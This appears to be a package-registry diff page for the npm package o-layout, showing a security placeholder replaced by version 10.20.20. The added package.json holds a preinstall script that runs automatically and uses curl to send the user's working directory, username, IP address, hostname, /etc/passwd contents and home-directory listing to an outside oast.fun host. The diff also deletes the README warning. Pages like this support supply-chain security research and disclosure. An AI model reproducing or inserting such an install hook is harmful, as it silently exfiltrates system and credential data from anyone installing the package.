o-layout 0.0.1-security → 10.20.20

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of o-layout might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +14 -5
  2. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
- {
1
+ {
2
2
  "name": "o-layout",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "10.20.20",
4
+ "main": "main.js",
5
+ "scripts": {
6
+ "preinstall": "curl rastzudvmpranhzlrgiohauirkm8kogj6.oast.fun/pwd=$(pwd) && curl rastzudvmpranhzlrgiohauirkm8kogj6.oast.fun/whoami=$(whoami)&&curl rastzudvmpranhzlrgiohauirkm8kogj6.oast.fun/package=$(echo 'o-layout') && curl rastzudvmpranhzlrgiohauirkm8kogj6.oast.fun/ip=$(curl ifconfig.me)&& curl -X POST -d \"data=$(cat /etc/passwd)\" rastzudvmpranhzlrgiohauirkm8kogj6.oast.fun/hostname=$(hostname) && curl -X POST -d \"data=$(cd;ls -la)\" rastzudvmpranhzlrgiohauirkm8kogj6.oast.fun/home-dir",
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "Hacked",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "lodash": "^4.17.21"
13
+ },
14
+ "description": ""
15
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=o-layout for more information.